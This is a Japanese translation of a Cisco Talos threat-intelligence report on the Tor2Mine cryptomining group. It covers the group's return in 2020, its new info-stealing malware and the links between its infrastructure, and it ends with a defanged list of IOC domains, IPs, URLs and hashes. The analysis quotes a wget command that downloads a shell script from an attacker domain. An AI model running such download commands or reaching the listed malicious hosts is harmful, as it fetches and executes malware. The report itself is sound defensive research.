脅威サマリー
- Cisco Talos は暗号通貨マイニンググループ Tor2Mine の活動再開を確認しました。前回 Tor2Mine の活動が確認されたのは 2018 年に遡ります。Tor2Mine は新しいマルウェアを展開してログイン情報を収集し、より多くの仮想通貨を盗み出そうと目論んでいます。情報搾取型マルウェア「AZORult」、リモートアクセスツール「Remcos」、バックドア型トロイの木馬「DarkVNC」、クリップボードの不正操作により暗号通貨を盗み出すマルウェアなどが使われています。
- 攻撃では新しい IP アドレス 1 件と新しいドメイン 2 件も使用されています。
- Tor2Mine の新しい TTP(戦術、技術、手順)を見ると、変動の激しい暗号通貨市場で収益源を多様化しようとする意図がうかがえます。
最新情報
Tor2Mine は以前も暗号通貨マイニングマルウェアを攻撃に使用していました。被害者の環境に侵入し、システムリソースを不正に使用して通貨をマイニング(採掘)するのです。今回の活動再開で Tor2Mine は新しいマルウェアを組み込んでいます。収益源を多様化することにより、コロナ禍に見舞われて世界中の暗号通貨が激しく変動している中、状況に応じて動こうとしていると考えられます。
詳細
2020 年 1 月から 6 月にかけて、Tor2Mine の活動再開が確認されてきました。世界的に景気が後退し、暗号通貨市場が不安定になっていますが、Tor2Mine は金銭目的で攻撃を続けています。以前も暗号通貨マイニングマルウェアを送り込んできた Tor2Mine ですが、今回はコロナ禍の影響を打破すべく、被害者のログイン情報を収集して一銭でも多く盗み取る新しいマルウェアを使用しています。現状で新たな TTP とインフラを使用している点は、Tor2Mine のしぶとさを見せつけています。業界や分野を問わず攻撃者は簡単に消滅しないこと、そして高度なセキュリティの維持が不可欠であることを再認識させる事例だと言えるでしょう。
Tor2Mine で注目すべき点は、マルウェアを感染させるコマンド&コントロール(C2)として Tor2web を使用していることです。Tor2web サービスは、ユーザが匿名で通信できる Tor ネットワークとインターネットのブリッジとして機能します。Tor2web はマルウェア作成者にとって便利なサービスです。マルウェアから Tor ネットワークに直接接続した場合、疑われてブロックされる可能性がありますが、その必要がないからです。また、C2 サーバの IP アドレスを隠せるという利点もあります。
分析
Talos は最近、Tor2Mine に関連付けられたエンドポイントテレメトリで Tor2Mine のアクティビティを同定し、6 社以上が影響を受けたことを確認しました。攻撃が 2020 年 1 月から続いていることを踏まえると、Tor2Mine の活動が前回特定された 2018 年 12 月からおよそ 1 年間の休止期間を経て復活したようです。インフラは大部分がそのまま踏襲されていますが、今回は Talos が特定した新しい IP アドレス 1 件と新しいドメイン 2 件も使用されています。さらなる調査では、Tor2Mine がログイン情報を収集して一銭でも多く盗み取るため、新しいマルウェアを「XMRig」と同時に展開していることを示唆する証拠が見つかりました。新しいマルウェアには、情報搾取型マルウェア 「AZORult」、リモートアクセスツール「Remcos」、バックドア型トロイの木馬「DarkVNC」、クリップボードの不正操作により暗号通貨を盗み出すスティーラーなどが含まれます。
Tor2Mine が活動再開
最近の攻撃の多くでは、すでに悪用が発覚しているインフラが使用されています。ある電気通信会社に対する攻撃を調査したところ、複数の Tor2Mine 関連ドメインからファイルをダウンロードする PowerShell コマンドの実行を確認しました。攻撃者は HTA ファイルの実行ユーティリティである Mshta を使用して、複数の URL(以下のリストを参照)から Microsoft HTML アプリケーション(HTA)の実行を試みます。
- hxxps[:]//qm7gmtaagejolddt[.]onion[.]to/check[.]hta
- hxxp[:]//res1[.]myrms[.]pw/upd[.]hta
- hxxp[:]//eu1[.]minerpool[.]pw/check[.]hta
qm7gmtaagejolddt[.]onion[.] ドメインは Tor2Mine がプロキシ通信に使用したことのある既知の Tor2web ゲートウェイです。Tor2Mine を取り上げた過去のブログによると、このドメインは遅くとも 2018 年から攻撃に使用されています。res1[.]myrms[.]pw ドメインも、以前 Tor2Mine が使用したと判明している IP アドレス(107[.]181[.]187[.]132)でホストされているため、Tor2Mine とのつながりが見受けられます。2018 年のブログに掲載したアクティビティの概要を見ると、Tor2Mine はこれと同じ IP アドレスから、PowerShell スクリプトを使用して侵害されたシステムにフォローアップマルウェアをインストールしています。同じく 107[.]181[.]187[.]132 でホストされている eu1[.]minerpool[.]pw も 2018 年のアクティビティで攻撃者が使用したマイニングプールです。
やはり PowerShell コマンドを使用して、hxxp[:]//v1[.]fym5gserobhh[.]pw/v1/check1[.]ps1 から .ps1 ファイルをダウンロードしています。v1[.]fym5gserobhh[.]pw ドメインも同じ IP アドレスでホストされています。Umbrella のデータによると、v1[.]fym5gserobhh[.]pw と eu1[.]minerpool[.]pw の登録先は 2 つの別個の reg[.]ru ネームサーバ(ns2[.]reg[.]ru と ns1[.]reg[.]ru)です。
新たに特定されたインフラ
最近の攻撃では、2018 年から引き続き使用されているドメインと IP アドレスを多数特定しましたが、以前は Tor2Mine と関連付けられていなかった IOC(侵入の痕跡)も新たに見つかりました。5 月中旬には、別の企業に対する同様の攻撃でも Mshta を使用して HTA ファイルが実行されていることを確認しました。その多くで、上述した URL と同じ URL が使用されています。一方で、新しいドメイン(eu1[.]ax33y1mph[.]pw)が使用されたことも確認しています。2020 年 4 ~ 5 月にかけて、ある環境コンサルティング会社がこの影響を受けました。Umbrella によると、新しいドメインも同じ IP アドレス(107[.]181[.]187[.]132)でホストされ、2020 年 3 月に初めて見つかっています。このため、Tor2Mine のインフラに比較的新しく加わったコンポーネントと見られています。
eu1[.]ax33y1mph[.]pw の DNS 解決に関する情報を示す Umbrella のデータ。
調査が進むにつれ、別の企業に対しても、この新しい Tor2Mine インフラを使用して攻撃を仕掛けている関連アクティビティが次々に見つかりました。新しく発見した IP アドレス(185[.]10[.]68[.]147)では少なくとも 2 つのドメイン(asq[.]r77vh0[.]pw、asq[.]d6shiiwz[.]pw)がホストされています。Talos では Tor2Mine のインフラの一部であると評価しています。asq[.]r77vh0[.]pw の登録先は前述した 2 つの reg[.]ru プロバイダーです。Talos のエンドポイントテレメトリに初めて検出されたのは 2019 年 7 月(別々の日付で 2 回)ですが、その後は 2020 年 2 月後半まで検出されていませんでした。このドメインは以前 107[.]181[.]160[.]197 でホストされており、Tor2Mine が攻撃に使用していた IP であると 2018 年の Talos ブログで触れています。
asq[.]r77vh0[.]pw ドメインでも、少なくとも 1 つの参照ファイル(67f5f339c71c9c887dfece5cb6e2ab698b8c8a575d1ab9dd37ac32232be1aa04)が、かつて Tor2Mine が使用していた IP(107[.]181[.]160[.]197)と新しく特定された IP(185[.]10[.]68[.]147)につながっていることから、185[.]10[.]68[.]147 が Tor2Mine のインフラの拡張である線が濃厚です。
asq[.]r77vh0[.]pw に対する DNS リクエストの急増を示す Cisco Umbrella。
asq[.]d6shiiwz[.]pw ドメインの登録先も、先ほどとまったく同じ 2 つの reg[.]ru ホスティングプロバイダーです。VirusTotal によると同ドメインには、以前特定された Tor2Mine の URL と文字列が似ている URL(末尾が「.hta」や「checking.ps1」)数件をホストしていた履歴があります。たとえば hxxp[:]//asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta、hxxps[:]//asq[.]d6shiiwz[.]pw/win/checking[.]ps1 の 2 つがホストされていました。両ドメインは以前も、同一の IP アドレス(195[.]123[.]234[.]33)でホストされていました。この IP アドレスは XMRig 系の悪意あるペイロードもホストしています。
Talos は 2020 年 3 月 15 日に初めて 185[.]10[.]68[.]147 でこれらのドメインがホストされていることを確認しました。Umbrella によると、本稿執筆時点でも状況は変わりません。同じ IP アドレスは XMRig の亜種である XMRigCC に関連付けられたドメイン(fh[.]fhcwk4q[.]xyz)もホストするなど、Tor2Mine 以外の多くの攻撃者も使用しています。 以上のドメインに加え、Talos は VirusTotal で 185[.]10[.]68[.]147 がホストしている URL を調べ、hxxp[:]//185[.]10[.]68[.]147/win/update[.]hta、hxxp[:]//185[.]10[.]68[.]147/win/del[.]ps1 など、前述の Tor2Mine の URL の多くと構造が似ている URL を数個発見しました。前述のとおり Tor2Mine は PowerShell コマンドを使用して .ps1 ファイルをダウンロードし、Mshta ファイルを実行することが確認されています。
同じ IP が通信用シェルスクリプトファイル(4d21cab49f7d7dd7d39df72b244a249277c37b5561e74420dfc96fb22c8febac)もホストしています。このファイルには hxxp[:]//asq[.]r77vh0[.]pw/lin/update[.]sh への wget リクエストを含む文字列が含まれています。完全に同一の wget リクエスト(「wget –user-agent “linux” -q -O – hxxp://asq[.]r77vh0[.]pw/lin/update[.]sh」)は VirusTotal のファイル(daa768e8d66aa224491000e891f1ef2cb7c674df2f3097fef7db90d692e2f539)にも含まれていることを確認しました。VirusTotal によると、このファイルは前述した XMRigCC の IP アドレス(195[.]123[.]234[.]33)を参照しています。さらに Umbrella によれば、この IP アドレスは今回新しく特定したドメインを以前にホストしていました。
Tor2Mine の IP とドメインを含むファイル。
Talos は同じ手法を用いて、同一の文字列を含む複数のファイルをさらに特定しました。たとえば 3c2d83b9e9b1b107c3db1185229865b658bbaebc8020c1b2a4f9155ca87858fc というファイルには複数の URL(hxxp[:]//107[.]181[.]160[.]197/lin/32/xmrig など)が埋め込まれていますが、これらの URL は 107[.]181[.]187[.]132 でホストされています。これは前述のとおり Tor2Mine の IP と判明しています。Tor2Mine が以前使用していたインフラに対する接続情報は、185[.]10[.]68[.]147 が同じ攻撃者の使用する新しい IP であることを示唆しています。
ミックスに新しく追加されたマルウェア
今回の調査では、Tor2Mine がログイン情報を収集してさらに多くの金銭を盗み取ろうとする中で、AZORult をはじめとする新しいマルウェアを「XMRig」と同時に展開していることを示唆する証拠が見つかりました。 Talos が 2020 年 4 月に公開した前回の調査結果では、複数の異なる実行可能ペイロードを組み込んだ、金銭目的の複雑な攻撃について概要を説明しました。攻撃で使われていたのは、情報搾取型マルウェア「AZORult」の亜種と RAT の 「Remcos」、バックドア型トロイの木馬「DarkVNC」、クリップボードの不正操作により暗号通貨を盗み出すスティーラーです。4 月のブログ記事で触れたインフラの多くが、今回 Talos が新しく特定した多数の Tor2Mine の IOC と重なっています。同ブログ記事によると、調査したキャンペーンには XMRigCC ペイロードの設定で参照されているドメインがいくつか含まれていました。このうち eu[.]minerpool[.]pw、rs[.]fym5gserobhh[.]pw はいずれも Talos が最近の調査で発見した eu1[.]minerpool[.]pw、v1[.]fym5gserobhh[.]pw と文字列が似ています。同じ設定の中には、今回新しく特定した Tor2Mine の IP(185[.]10[.]68[.]220)も含まれています。
以上の類似点に加え、4 月のブログ記事では AZORult を使用した攻撃者が 195[.]123[.]234[.]33 から XMRig をダウンロードしていることに触れています。この IP アドレスは、今回新しく特定した Tor2Mine の 2 つのドメイン(asq[.]r77vh0[.]pw、 asq[.]d6shiiwz[.]pw)を以前ホストしていました。さらにこれら 2 つのドメインは、4 月のブログで概説した攻撃者も使用していました。両ドメインに関連付けられている URL は、最近 Talos が Tor2Mine 関連で発見した URL の多くと構造が似ています(hxxps://asq[.]r77vh0[.]pw/win/checking[.]ps1、hxxps://asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta など)。
AZORult などの新しいマルウェアが Tor2Mine の TTP(戦術、技術、手順)に追加されている公算が大きいことから、攻撃者が今後も活動を続け、さらに多くの金銭を盗み取るために、より狡猾な手口を繰り出そうとしてくることが分かります。特に今年になって見られている Tor2Mine のアクティビティは、活動を再開した PowerGhost や MyKings など、過去数か月間に Talos が観察した暗号通貨マイナー全般の増加と軌を一にしています。
全体像
Tor2Mine など、利益目当てでマルウェアを拡散させる多数のハッカー集団が、法に則った多くのグローバル企業と同じように、製品の創出、流通、諸経費、インフラ、サプライチェーン、安定した収入源といった運営上の課題を抱えるケースは珍しくありません。Tor2Mine の活動で見てきたように、金銭的利益を目的とするサイバー攻撃は、収益性の高い手口の維持に依存しています。そのため彼らは今後もより巧妙な手口を考案し続けるでしょう。暗号通貨マイナーから十分な収益を得られなくなれば、攻撃者は手口をさらに多様化させるため、ランサムウェアなどのより危険な脅威が増加すると思われます。結局のところ、事業を継続するためには周囲の移り変わりに合わせて組織も絶えず変化する必要があるように、マルウェアを拡散するハッカー集団も俊敏性を維持し、新しい課題に対応する必要があるということです。
Advanced Malware Protection(AMP)は、これらの攻撃者によるマルウェアの実行の阻止に最適です。AMP 内に存在するエクスプロイト防止機能は、このような未知の攻撃からお客様を自動的に保護するように設計されています。
Cisco Cloud Web Security(CWS)または Web セキュリティアプライアンス(WSA)の Web スキャンは、悪意のある Web サイトへのアクセスを防ぎ、攻撃に使用されるマルウェアを検出します。
E メールセキュリティは、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。
次世代ファイアウォール(NGFW)、次世代侵入防御システム(NGIPS)、Cisco ISR、Meraki MX などのネットワーク セキュリティ アプライアンスは、今回の脅威に関連する不正アクティビティを検出します。
AMP Threat Grid は、悪意のあるバイナリを特定し、すべてのシスコセキュリティ製品に保護機能を組み込みます。
Umbrella(シスコのセキュア インターネット ゲートウェイ(SIG))は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。
オープンソースの Snort サブスクライバルールセットをお使いであれば、Snort.org で購入可能な最新のルールパックをダウンロードすると、最新状態を維持できます。
IOC(侵入の痕跡)
ドメイン
v1[.]fym5gserobhh[.]pw
res1[.]myrms[.]pw
eu1[.]minerpool[.]pw
eu1[.]ax33y1mph[.]pw
asq[.]r77vh0[.]pw
asq[.]d6shiiwz[.]pw
IPS
107[.]181[.]187[.]132
185[.]10[.]68[.]147
195[.]123[.]234[.]33
URL
hxxp[:]//v1.fym5gserobhh.pw/php/func.php
hxxp[:]//v1.fym5gserobhh.pw/v1/check1.ps1
hxxp[:]//eu1.minerpool.pw/check.hta
hxxp[:]//eu1.minerpool.pw/upd.hta
hxxp[:]//eu1.minerpool.pw/rckl/check.hta
hxxp[:]//res1.myrms.pw/upd.hta
hxxps[:]//eu1.ax33y1mph.pw/check.hta
hxxps[:]//qm7gmtaagejolddt.onion.to/check.hta
hxxps[:]//asq.r77vh0.pw/win/hssl/r7.hta
hxxps[:]//asq.r77vh0.pw/win/php/func.php
hxxp[:]//asq.r77vh0.pw/win/checking.hta
hxxp[:]//asq.d6shiiwz.pw/win/hssl/d6.hta
hxxps[:]//asq.d6shiiwz.pw/win/checking.ps1
hxxp[:]//107.181.160.197/lin/32/xmrig
hxxp[:]//185.10.68.147/win/update.hta
hxxp[:]//185.10.68.147/win/del.ps1qm7gmtaagejolddt.onion.to
ファイルのハッシュ値
67f5f339c71c9c887dfece5cb6e2ab698b8c8a575d1ab9dd37ac32232be1aa04
4d21cab49f7d7dd7d39df72b244a249277c37b5561e74420dfc96fb22c8febac
3c2d83b9e9b1b107c3db1185229865b658bbaebc8020c1b2a4f9155ca87858fc
daa768e8d66aa224491000e891f1ef2cb7c674df2f3097fef7db90d692e2f539
本稿は 2020 年 6 月 11 日に Talos Group のブログに投稿された「Tor2Mine is up to their old tricks — and adds a few new ones」の抄訳です。